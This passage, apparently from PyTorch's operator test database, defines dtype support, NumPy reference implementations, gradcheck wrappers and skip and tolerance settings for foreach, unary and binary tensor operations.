dtypesIfCUDA=all_types_and_complex(), sample_inputs_func=sample_inputs_foreach, ), ForeachFuncInfo( 'sqrt', dtypes=floating_and_complex_types_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.half), ), ForeachFuncInfo( 'ceil', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), ), ForeachFuncInfo( 'erf', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), ), ForeachFuncInfo( 'erfc', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), ), ForeachFuncInfo( 'expm1', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), ), ForeachFuncInfo( 'floor', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), ), ForeachFuncInfo( 'log1p', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half), ), ForeachFuncInfo( 'round', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), ), ForeachFuncInfo( 'frac', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), ), ForeachFuncInfo( 'reciprocal', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half), ), ForeachFuncInfo( 'sigmoid', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half), ), ForeachFuncInfo( 'trunc', dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), ), ForeachFuncInfo( 'abs', dtypes=all_types_and_complex_and(torch.bfloat16, torch.half), dtypesIfCUDA=all_types_and_complex_and(torch.bfloat16, torch.half, torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), ] foreach_binary_op_db: List[OpInfo] = [ ForeachFuncInfo( "add", dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), supports_alpha_param=True, ), ForeachFuncInfo( "sub", dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), supports_alpha_param=True, ), ForeachFuncInfo( "mul", dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), skips=( # Ref: https://github.com/pytorch/pytorch/issues/77946 DecorateInfo(unittest.skip("Unable to reproduce failure locally"), "TestForeach", "test_binary_op_scalarlist_fastpath", device_type='cuda', dtypes=(torch.float16,)), ) ), ForeachFuncInfo( "div", dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16), skips=( # Ref: https://github.com/pytorch/pytorch/issues/77946 DecorateInfo(unittest.skip("Unable to reproduce failure locally"), "TestForeach", "test_binary_op_scalarlist_fastpath", device_type='cuda', dtypes=(torch.float16,)), ) ), ] foreach_pointwise_op_db: List[ForeachFuncInfo] = [ ForeachFuncInfo( "addcmul", dtypes=all_types_and_complex(), dtypesIfCUDA=all_types_and_complex_and(torch.half, torch.bfloat16), ), ForeachFuncInfo( "addcdiv", dtypes=all_types_and_complex(), dtypesIfCUDA=all_types_and_complex_and(torch.half, torch.bfloat16), ), ] foreach_minmax_op_db: List[ForeachFuncInfo] = [ ForeachFuncInfo( "maximum", dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), dtypesIfCUDA=all_types_and(torch.float16, torch.bool), ), ForeachFuncInfo( "minimum", dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), dtypesIfCUDA=all_types_and(torch.float16, torch.bool), ), ] foreach_reduce_op_db: List[ForeachFuncInfo] = [ ForeachFuncInfo( "norm", dtypes=floating_and_complex_types_and(torch.float16, torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, torch.bfloat16), ), ] def reference_sign(x): if x.dtype == np.bool_: # `np.sign` doesn't support `bool`. # >>> np.sign(True) # ufunc 'sign' did not contain a loop # with signature matching types dtype('bool') -> dtype('bool') return np.sign(x, dtype=np.uint8).astype(np.bool_) return np.sign(x) def reference_sgn(x): # NumPy doesn't have an equivalent to `torch.sgn` when the dtype is complex. # For complex inputs, `np.sign` returns sign(x.real) + 0j if x.real != 0 else sign(x.imag) + 0j. # while `torch.sgn` returns, 0 if abs(input) == 0 else input/abs(input) if x.dtype not in [np.complex64, np.complex128]: return reference_sign(x) out = (x / np.abs(x)) if out.ndim == 0: # Handle x == 0 case if (x == 0): # Can't assign to np.complex object # So make a new one. return np.array(complex(0, 0), dtype=x.dtype) return out # Handle x == 0 case mask = (x == 0) out[mask] = complex(0, 0) return out def reference_sigmoid(x): # 'scipy.special.expit' not supported for the input types if x.dtype in [np.complex64, np.complex128]: return (1 / (1 + np.exp(-x))) return scipy.special.expit(x) def reference_logsigmoid(x): return np.where( x < 0, x - np.log1p(np.exp(x)), -np.log1p(np.exp(-x))) def reference_hardsigmoid(x): intermediate = x / 6 + 0.5 y = np.clip(intermediate, 0, None) return np.where(y > 1, 1, y).astype(x.dtype) def reference_lgamma(x): # scipy.special.gammaln returns `-inf` when input is `-inf`. # While Pytorch, C and C++, all return `inf` when input is `-inf`. # Reference: # https://en.cppreference.com/w/cpp/numeric/math/lgamma # https://en.cppreference.com/w/c/numeric/math/lgamma # To handle the above discrepancy, # we replace -inf with inf so values # that were originally -inf map to inf as expected if x.dtype.kind == 'f': x = np.where(x == float('-inf'), np.array(float('inf'), dtype=x.dtype), x) out = scipy.special.gammaln(x) if x.dtype == np.float16: # `scipy.special.gammaln` returns output of float32 when input is float16, # while `torch.lgamma` preserves `float16`. But due to smaller range of float16, # Pytorch version outputs `inf` while SciPy returns finite values. out = out.astype(np.float16) return out def reference_polygamma(x, n): # WEIRD `scipy.special.polygamma` behavior # >>> scipy.special.polygamma(0, np.array(501, dtype=np.float32)).dtype # dtype('float64') # >>> scipy.special.polygamma(0, np.array([501], dtype=np.float32)).dtype # dtype('float32') # # Thus we cast output to the default torch dtype or preserve double result_dtype = torch_to_numpy_dtype_dict[torch.get_default_dtype()] if x.dtype == np.double: result_dtype = np.double return scipy.special.polygamma(n, x).astype(result_dtype) def reference_mvlgamma(x, d): if x.dtype == np.float16: return scipy.special.multigammaln(x, d).astype(np.float16) return scipy.special.multigammaln(x, d) def reference_softplus(input, beta=1, threshold=20): non_linear = input * beta <= threshold output = input.copy() output[non_linear] = np.log(1 + np.exp(beta * input[non_linear])) / beta return output def reference_gelu(X, *, approximate='none'): def _gelu_ref(X): return X * stats.norm.cdf(X) def _tanh_gelu_ref(X): M_SQRT_2_PI = math.sqrt(2 / math.pi) Z = M_SQRT_2_PI * (X + 0.044715 * np.power(X, 3.0)) return 0.5 * X * (1.0 + np.tanh(Z)) if approximate == 'tanh': return _tanh_gelu_ref(X) else: return _gelu_ref(X) def reference_one_hot(a: np.ndarray, num_classes: int = -1) -> np.ndarray: if num_classes == -1: num_classes = int(np.amax(a) + 1) idcs = a.reshape(-1) + np.arange(0, a.size, dtype=np.int64) * num_classes one_hot = np.zeros((a.size, num_classes), dtype=a.dtype) np.put(one_hot, idcs, 1) return one_hot.reshape(*a.shape, -1) def reference_mse_loss(input, target, reduction="mean"): se = (input - target) ** 2 if reduction == "mean": return np.mean(se) elif reduction == "sum": return np.sum(se) else: # reduction == "none" return se def wrapper_set_seed(op, *args, **kwargs): """Wrapper to set seed manually for some functions like dropout See: https://github.com/pytorch/pytorch/pull/62315#issuecomment-896143189 for more details. """ with freeze_rng_state(): torch.manual_seed(42) return op(*args, **kwargs) def reference_layer_norm(inp: np.ndarray, normalized_shape: Tuple[int], weight=None, bias=None, eps=1e-5): feature_size = np.prod(normalized_shape) inp_view = inp.reshape(-1, feature_size) # type: ignore[call-overload] mean = inp_view.mean(axis=-1, keepdims=True) var = inp_view.var(axis=-1, ddof=0, keepdims=True) Y = (inp_view - mean) / np.sqrt(var + eps) if weight is None and bias is not None: Y = Y + bias.reshape(-1) elif weight is not None and bias is None: Y = Y * weight.reshape(-1) elif weight is not None and bias is not None: Y = Y * weight.reshape(-1) + bias.reshape(-1) return Y.reshape(*inp.shape) def reference_group_norm(inp: np.ndarray, num_groups: int, weight=None, bias=None, eps=1e-5): inp_view = inp if np.prod(inp.shape) != 0: inp_view = inp.reshape((inp.shape[0], num_groups, -1)) mean = inp_view.mean(axis=-1, keepdims=True) var = inp_view.var(axis=-1, ddof=0, keepdims=True) Y = (inp_view - mean) / np.sqrt(var + eps) Y = Y.reshape(inp.shape) if weight is not None: # weight is a vector of length equal to the channel if len(Y.shape) > 2: weight = np.tile(np.expand_dims(weight, 1), [1] + list(inp.shape[2:])) Y = Y * weight if bias is not None: # bias is a vector of length equal to the channel if len(Y.shape) > 2: bias = np.tile(np.expand_dims(bias, 1), [1] + list(inp.shape[2:])) Y = Y + bias return Y # using a custom reference function since numpy only has a string side arg (instead of right and side) and doesn't # have an out_int32 arg. Additionally, numpy doesn't support searchsorted with ND arrays, so this splits those into # stacked 1D cases def reference_searchsorted(sorted_sequence, boundary, out_int32=False, right=False, side='left', sorter=None): side = 'right' if (right or side == 'right') else 'left' if len(sorted_sequence.shape) == 1 : ret = np.searchsorted(sorted_sequence, boundary, side=side, sorter=sorter) return ret.astype(np.int32) if out_int32 else ret elif sorted_sequence.shape[0] == 0: if sorter is not None: sorter = sorter.flatten() ret = np.searchsorted(sorted_sequence.flatten(), boundary.flatten(), side=side, sorter=sorter) ret = ret.astype(np.int32) if out_int32 else ret return ret.reshape(boundary.shape) else: # numpy searchsorted only supports 1D inputs so we split up ND inputs orig_shape = boundary.shape num_splits = np.prod(sorted_sequence.shape[:-1]) splits = range(0, num_splits) sorted_sequence, boundary = sorted_sequence.reshape(num_splits, -1), boundary.reshape(num_splits, -1) if sorter is not None: sorter = sorter.reshape(num_splits, -1) split_sequence = [sorted_sequence[i] for i in splits] split_boundary = [boundary[i] for i in splits] split_sorter = [sorter[i] if (sorter is not None) else None for i in splits] split_ret = [np.searchsorted(s_seq, b, side=side, sorter=s_sort) for (s_seq, b, s_sort) in zip(split_sequence, split_boundary, split_sorter)] split_ret = [i.astype(np.int32) for i in split_ret] if out_int32 else split_ret return np.stack(split_ret).reshape(orig_shape) def gradcheck_wrapper_hermitian_input(op, input, *args, **kwargs): """Gradcheck wrapper for functions that take Hermitian matrices as input. They require a modified function because the finite-difference algorithm for calculating derivatives does not preserve the Hermitian property of the input. """ return op(input + input.mH, *args, **kwargs) def gradcheck_wrapper_triangular_input(op, *args, upper=False, idx=0, **kwargs): """Gradcheck wrapper for functions that take lower or upper triangular matrices as input. They require a modified function because the finite-difference algorithm for calculating derivatives does not preserve the triangular property of the input. `idx` is used to specific which `args[idx]` is to be triangularized. """ triangular_arg = args[idx].triu() if upper else args[idx].tril() return op(*args[:idx], triangular_arg, *args[idx + 1:], upper, **kwargs) def gradcheck_wrapper_triangular_input_real_positive_diagonal(op, *args, upper=False, idx=0, **kwargs): """Gradcheck wrapper for functions that take lower/upper triangular matrices with real and positive diagonals, for example, cholesky-like operations. """ arg = args[idx] arg_diag = arg.diagonal(0, -2, -1) arg_diag_embed = torch.diag_embed(arg_diag) id_diag_tensor = torch.ones_like(arg_diag) id_tensor = torch.diag_embed(id_diag_tensor) # new_arg = arg - diag(arg) + I new_arg = arg - arg_diag_embed + id_tensor return gradcheck_wrapper_triangular_input( op, *args[:idx], new_arg, *args[idx + 1:], upper=upper, idx=idx, **kwargs ) def gradcheck_wrapper_masked_operation(op, input, *args, **kwargs): """Gradcheck wrapper for masked operations. When mask is specified, replaces masked-out elements with zeros. Use for operations that produce non-finite masked-out elements, for instance, for minimum and maximum reductions. """ output = op(input, *args, **kwargs) mask = kwargs.get('mask') if mask is not None: output_mask = torch._masked._output_mask(op, input, *args, **kwargs) output = torch.where(output_mask, output, output.new_zeros([])) return output def reference_reduction_numpy(f, supports_keepdims=True): """Wraps a NumPy reduction operator. The wrapper function will forward dim, keepdim, mask, and identity kwargs to the wrapped function as the NumPy equivalent axis, keepdims, where, and initiak kwargs, respectively. Args: f: NumPy reduction operator to wrap supports_keepdims (bool, optional): Whether the NumPy operator accepts keepdims parameter. If it does not, the wrapper will manually unsqueeze the reduced dimensions if it was called with keepdim=True. Defaults to True. Returns: Wrapped function """ @wraps(f) def wrapper(x: np.ndarray, *args, **kwargs): # Copy keys into a set keys = set(kwargs.keys()) dim = kwargs.pop('dim', None) keepdim = kwargs.pop('keepdim', False) if 'dim' in keys: dim = tuple(dim) if isinstance(dim, Sequence) else dim # NumPy reductions don't accept dim=0 for scalar inputs # so we convert it to None if and only if dim is equivalent if x.ndim == 0 and dim in {0, -1, (0,), (-1,)}: kwargs['axis'] = None else: kwargs['axis'] = dim if 'keepdim' in keys and supports_keepdims: kwargs['keepdims'] = keepdim if 'mask' in keys: mask = kwargs.pop('mask') if mask is not None: assert mask.layout == torch.strided kwargs['where'] = mask.cpu().numpy() if 'identity' in keys: identity = kwargs.pop('identity') if identity is not None: if identity.dtype is torch.bfloat16: identity = identity.cpu().to(torch.float32) else: identity = identity.cpu() kwargs['initial'] = identity.numpy() if 'unbiased' in keys: unbiased = kwargs.pop('unbiased') if unbiased is not None: kwargs['ddof'] = int(unbiased) result = f(x, *args, **kwargs) # Unsqueeze reduced dimensions if NumPy does not support keepdims if keepdim and not supports_keepdims and x.ndim > 0: dim = list(range(x.ndim)) if dim is None else dim result = np.expand_dims(result, dim) return result return wrapper def loss_reference_reduction_wrapper(fn): def wrapper(input, target, *, size_average=None, reduce=None, reduction="mean", **other_kwargs): if size_average is not None or reduce is not None: raise RuntimeError( "The keyword arguments 'size_average' and 'reduce' are deprecated and not supported by this wrapper" ) output = fn(input, target, **other_kwargs) if reduction == "mean": return np.mean(output) elif reduction == "sum": return np.sum(output) else: # reduction == "none" return output return wrapper @loss_reference_reduction_wrapper def reference_smooth_l1_loss(input, target, beta=1.0): diff = input - target abs_diff = np.abs(diff) above_threshold = abs_diff >= beta loss = np.empty_like(input) loss[above_threshold] = abs_diff[above_threshold] - 0.5 * beta loss[~above_threshold] = diff[~above_threshold] ** 2 / (2 * beta) return loss def reference_std_var(f): """Forwards unbiased/correction kwargs as NumPy's equivalent ddof""" g = reference_reduction_numpy(f) @wraps(g) def wrapper(x: np.ndarray, *args, **kwargs): assert not ('unbiased' in kwargs and 'correction' in kwargs) if 'unbiased' in kwargs: kwargs['ddof'] = int(kwargs.pop('unbiased')) elif 'correction' in kwargs: kwargs['ddof'] = kwargs.pop('correction') return g(x, *args, **kwargs) return wrapper def generate_std_var_kwargs(t: torch.Tensor, **kwargs): """Generates unbiased/correction kwargs for std/var operators""" yield ((), {'unbiased': True}) yield ((), {'unbiased': False}) # Currently, calling std with correction is only enabled when # both dim and keepdim are provided. if 'dim' in kwargs and 'keepdim' in kwargs: yield ((), {'correction': 0}) yield ((), {'correction': 1}) numel = torch.tensor(t.shape)[kwargs.get('dim')].prod() yield ((), {'correction': numel // 2}) def error_inputs_mean(op_info, device, **kwargs): err_msg1 = (r"mean\(\): could not infer output dtype. " r"Input dtype must be either a floating point or complex dtype. " r"Got: Long") si1 = SampleInput( make_tensor((3, 4, 5), dtype=torch.int64, device=device), args=([],)) err_msg2 = (r"mean\(\): could not infer output dtype. " r"Optional dtype must be either a floating point or complex dtype. " r"Got: Long") si2 = SampleInput( make_tensor((3, 4, 5), dtype=torch.float32, device=device), args=([],), kwargs={"dtype": torch.int64}) err_msg3 = "Expected out tensor to have dtype double, but got float instead" si3 = SampleInput( make_tensor((3, 4, 5), dtype=torch.int64, device=device), args=([],), kwargs={ "dtype": torch.float64, "out": make_tensor([], dtype=torch.float32, device=device), }) return (ErrorInput(si1, error_regex=err_msg1), ErrorInput(si2, error_regex=err_msg2), ErrorInput(si3, error_regex=err_msg3)) # Operator database (sorted alphabetically) op_db: List[OpInfo] = [ UnaryUfuncInfo('abs', aliases=('absolute', ), ref=np.abs, dtypes=all_types_and_complex_and(torch.half, torch.bfloat16, torch.chalf), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), skips=( # Inplace abs doesn't support complex inputs DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_inplace_grad', dtypes=(torch.cdouble,)), DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_inplace_gradgrad', dtypes=(torch.cdouble,)), DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_inplace_forward_mode_AD', dtypes=(torch.cdouble,)), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat]), # Reference: https://github.com/pytorch/pytorch/issues/49224 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', dtypes=[torch.int8], active_if=TEST_WITH_ASAN), # TODO: Fix test_out_arg_all_dtypes as torch.empty_like(expected_output) where expected_output=op(input) # We can break the logic of the loop over all possible types but it is OK. # https://github.com/pytorch/pytorch/blob/master/test/test_unary_ufuncs.py#L440-L449 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_out_arg_all_dtypes', dtypes=[torch.cfloat, torch.cdouble]), # The complex formula might be wrong DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_forward_mode_AD', dtypes=complex_types()), # Forward-over-reverse gradgrad might be wrong for complex (see above): DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', dtypes=complex_types()), # nonzero_count not implemented DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_consistency', dtypes=(torch.chalf,)), # nonzero_count not implemented DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_inplace', dtypes=(torch.chalf,)), # nonzero_count not implemented DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_sparse_csr_unary_out', dtypes=(torch.chalf,)), # add_out_op2_sparse_csr DecorateInfo(unittest.expectedFailure, 'TestSparseCSR', 'test_zero_to_zero_correspondence_unary', dtypes=(torch.chalf,)), ), supports_fwgrad_bwgrad=True, assert_autodiffed=True, supports_sparse_csr=True, supports_forward_ad=True), # NOTE: CPU complex acos produces incorrect outputs (https://github.com/pytorch/pytorch/issues/42952) UnaryUfuncInfo('acos', aliases=('arccos', ), ref=np.arccos, domain=(-1, 1), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=(precisionOverride({torch.float16: 1e-2, torch.bfloat16: 1e-1, torch.complex64: 1e-2}),), skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_normal', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), # Failing with wrong imaginary sign on at least some Windows jobs DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), # Failing with wrong imaginary sign on at least some Windows jobs DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_grad', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_method_grad', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_inplace_grad', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_forward_mode_AD', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_inplace_forward_mode_AD', dtypes=[torch.cdouble], active_if=IS_WINDOWS), )), # NOTE: the derivative for inplace acosh is not implemented UnaryUfuncInfo('acosh', aliases=('arccosh', ), ref=np.arccosh, domain=(1, None), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), # "rsqrt_cuda" not implemented for 'BFloat16' backward_dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), decorators=(precisionOverride({torch.bfloat16: 5e-2}),), supports_inplace_autograd=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_normal', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), # Failing with wrong imaginary sign on at least some Windows jobs DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), # Reference: https://github.com/pytorch/pytorch/issues/50692 DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_grad', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_method_grad', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_forward_mode_AD', device_type='cuda', dtypes=[torch.cdouble], active_if=IS_WINDOWS), ), # acosh is not defined at x < 1 (real) or |z| < 1 (complex) reference_numerics_filter=NumericsFilter( condition=lambda x: (torch.abs(x) < 1 if x.is_complex() else x < 1), safe_val=2)), BinaryUfuncInfo('add', # NumPy has no builtin reference for the alpha kwarg, but it is easy enough to emulate ref=lambda input, other, *, alpha=1: np.add(input, other) if alpha == 1 \ else np.add(input, np.multiply(alpha, other)), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), assert_autodiffed=True, sample_inputs_func=sample_inputs_add_sub, supports_fwgrad_bwgrad=True, supports_forward_ad=True, supports_two_python_scalars=True, decorators=( DecorateInfo( toleranceOverride({torch.chalf: tol(atol=1e-2, rtol=0)}), 'TestBinaryUfuncs', 'test_reference_numerics'), ), skips=( # boolean alpha not handled properly DecorateInfo(unittest.expectedFailure, 'TestCudaFuserOpInfo', 'test_nvfuser_correctness', dtypes=(torch.bool,)), # boolean alpha not handled properly DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.bool,)), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_numpy_refs', dtypes=(torch.complex128,)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_extremal_values', dtypes=(torch.complex64, torch.complex128)), )), BinaryUfuncInfo('mul', aliases=('multiply',), dtypes=all_types_and_complex_and(torch.chalf, torch.float16, torch.bfloat16, torch.bool), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_two_python_scalars=True), BinaryUfuncInfo('sub', # NumPy has no builtin reference for the alpha kwarg, but it is easy enough to emulate ref=lambda input, other, *, alpha=1: np.subtract(input, np.multiply(alpha, other)), aliases=('subtract',), dtypes=all_types_and_complex_and(torch.bfloat16, torch.float16, torch.chalf), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_add_sub, supports_two_python_scalars=True, decorators=( DecorateInfo( toleranceOverride({torch.float16: tol(atol=1e-2, rtol=0)}), 'TestBinaryUfuncs', 'test_reference_numerics'), DecorateInfo( toleranceOverride({torch.chalf: tol(atol=1e-2, rtol=0)}), 'TestCommon', 'test_complex_half_reference_testing', device_type='cpu'), DecorateInfo( toleranceOverride({torch.chalf: tol(atol=5e-3, rtol=0)}), 'TestDecomp', 'test_comprehensive', device_type='cpu'), DecorateInfo( toleranceOverride({torch.chalf: tol(atol=5e-3, rtol=0)}), 'TestDecomp', 'test_quick', device_type='cpu'), ), skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics', dtypes=(torch.uint8,)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_small_values', dtypes=(torch.uint8,)), )), OpInfo('addmm', # This addmm OpInfo is for when alpha and beta are not both equal to 1. # alpha=beta=1 is tested in the following opinfo, because that special case will # trigger addmm being decomposed by a jit pass. dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfROCM=floating_and_complex_types_and(torch.float16, torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if CUDA11OrLater else []), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, sample_inputs_func=sample_inputs_addmm), OpInfo('addmm', # When alpha=beta=1 as compile-time constants, JIT will decompose addmm into mm and add. variant_test_name='decomposed', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if(CUDA11OrLater or TEST_WITH_ROCM) else []), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, autodiff_nonfusible_nodes=['aten::add', 'aten::mm'], sample_inputs_func=partial(sample_inputs_addmm, alpha=1, beta=1), skips=( # https://github.com/pytorch/pytorch/issues/71784 DecorateInfo(unittest.skip('Skipped!'), 'TestNNCOpInfo', 'test_nnc_correctness', device_type='cpu', dtypes=(torch.float16,)), DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness', dtypes=(torch.float16,)), )), OpInfo('addmv', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.complex64, torch.complex128, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_addmv), OpInfo('addbmm', ref=lambda M, batch1, batch2, beta=1, alpha=1: np.add(np.multiply(np.asarray(beta, dtype=M.dtype), M), np.multiply(np.asarray(alpha, dtype=batch1.dtype), np.sum(np.matmul(batch1, batch2), axis=0))), dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_and_complex_types_and(torch.float16, *[torch.bfloat16] if (SM53OrLater and CUDA11OrLater) or TEST_WITH_ROCM else []), supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[ DecorateInfo( toleranceOverride({torch.float32: tol(atol=1.3e-05, rtol=1.3e-05), torch.complex64: tol(atol=1e-05, rtol=1.2e-03)}), 'TestCommon', 'test_numpy_refs')], skips=( # NVIDIA only assures that bfloat16 is supported by bmm if SM >= 5.3 DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_dtypes', device_type='cuda', active_if=not SM53OrLater), # addbmm does not correctly warn when resizing out= inputs DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning'), # https://github.com/pytorch/pytorch/issues/55907 DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager'), ), sample_inputs_func=sample_inputs_addbmm), OpInfo('baddbmm', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.float16, torch.complex64, torch.complex128, *[torch.bfloat16] if CUDA11OrLater or TEST_WITH_ROCM else []), backward_dtypesIfCUDA=floating_types_and(torch.float16, *[torch.bfloat16] if SM53OrLater or TEST_WITH_ROCM else [], torch.complex64, torch.complex128), supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[ DecorateInfo( toleranceOverride({torch.complex64: tol(atol=1e-05, rtol=1.2e-03)}), 'TestCommon', 'test_variant_consistency_eager', device_type='cuda'), DecorateInfo( toleranceOverride({torch.complex64: 